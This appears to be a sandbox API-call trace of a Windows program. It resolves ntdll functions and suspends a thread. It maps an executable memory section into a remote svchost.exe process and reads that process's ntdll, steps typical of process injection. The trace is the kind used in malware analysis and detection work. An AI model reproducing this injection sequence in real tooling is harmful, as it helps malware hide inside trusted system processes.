[0206.913] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtClose", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.914] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.922] CloseHandle (hObject=0x1e4) returned 1 [0206.922] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.922] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.922] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf5a0, ProcessInformationLength=0x30, ReturnLength=0x1eaf614 | out: ProcessInformation64=0x1eaf5a0, ReturnLength=0x1eaf614) returned 0x0 [0206.924] ResumeThread (hThread=0x1d8) returned 0x1 [0206.924] Sleep (dwMilliseconds=0x64) [0207.060] SuspendThread (hThread=0x1d8) returned 0x0 [0207.060] NtGetContextThread (in: ThreadHandle=0x1d8, Context=0x1eaf660 | out: Context=0x1eaf660*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x88, [65]=0x46, [66]=0xc7, [67]=0xf9, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xd0, [74]=0x39, [75]=0xce, [76]=0xf7, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0xce3a3440, SegEs=0x7ff7, SegDs=0x938cfc58, Edi=0xb0, Esi=0x0, Ebx=0x0, Edx=0xce39d000, Ecx=0x7ff7, Eax=0xce39d000, Ebp=0x7ff7, Eip=0xce39d000, SegCs=0x7ff7, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x40, [45]=0x34, [46]=0x3a, [47]=0xce, [48]=0xf7, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0207.061] NtCreateSection (in: SectionHandle=0x1eaf5fc, DesiredAccess=0xf001f, ObjectAttributes=0x1eaf5c0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x1eaf5d8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x1eaf5fc*=0x1e4) returned 0x0 [0207.061] NtMapViewOfSection (in: SectionHandle=0x1e4, ProcessHandle=0xffffffff, BaseAddress=0x1eaf5e4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x1eaf590*=0, ViewSize=0x1eaf598*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1eaf5e4*=0x2720000, SectionOffset=0x1eaf590*=0, ViewSize=0x1eaf598*=0x133000) returned 0x0 [0207.061] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0207.067] NtMapViewOfSection (in: SectionHandle=0x1e4, ProcessHandle=0x1dc, BaseAddress=0x1eaf628*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x1eaf5e0*=0, ViewSize=0x1eaf5e8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1eaf628*=0x810000, SectionOffset=0x1eaf5e0*=0, ViewSize=0x1eaf5e8*=0x133000) returned 0x0 [0207.068] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0207.068] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.068] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.068] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.068] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xce39d000, Buffer=0x7ff7, BufferSize=0x2343cc0, NumberOfBytesRead=0x28 | out: Buffer=0x7ff7, NumberOfBytesRead=0x28) returned 0x0 [0207.068] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x780761c0, Buffer=0x7ff9, BufferSize=0x2343ce8, NumberOfBytesRead=0x40 | out: Buffer=0x7ff9, NumberOfBytesRead=0x40) returned 0x0 [0207.068] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b034e0, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.068] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03350, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03990, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03e90, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b05200, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b054b0, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0207.069] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.069] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.069] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xce39d000, Buffer=0x7ff7, BufferSize=0x2343cc0, NumberOfBytesRead=0x28 | out: Buffer=0x7ff7, NumberOfBytesRead=0x28) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x780761c0, Buffer=0x7ff9, BufferSize=0x2343ce8, NumberOfBytesRead=0x40 | out: Buffer=0x7ff9, NumberOfBytesRead=0x40) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b034e0, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03148, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3e | out: Buffer=0xb0, NumberOfBytesRead=0x3e) returned 0x0 [0207.069] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03350, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.069] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03240, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3a | out: Buffer=0xb0, NumberOfBytesRead=0x3a) returned 0x0 [0207.070] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03990, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03b20, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x40 | out: Buffer=0xb0, NumberOfBytesRead=0x40) returned 0x0 [0207.070] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03e90, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b04020, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x44 | out: Buffer=0xb0, NumberOfBytesRead=0x44) returned 0x0 [0207.070] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b05200, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b03920, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3e | out: Buffer=0xb0, NumberOfBytesRead=0x3e) returned 0x0 [0207.070] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b054b0, Buffer=0xb0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0xb0, NumberOfBytesRead=0x98) returned 0x0 [0207.070] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x93b05640, Buffer=0xb0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3c | out: Buffer=0xb0, NumberOfBytesRead=0x3c) returned 0x0 [0207.070] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0207.070] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0207.070] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0207.070] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0207.070] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0207.070] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.070] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2860000 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2860000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2861000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2862000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2863000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2864000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2865000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2866000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2867000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.071] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2868000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2869000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x286a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x286b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x286c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x286d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x286e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.072] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, 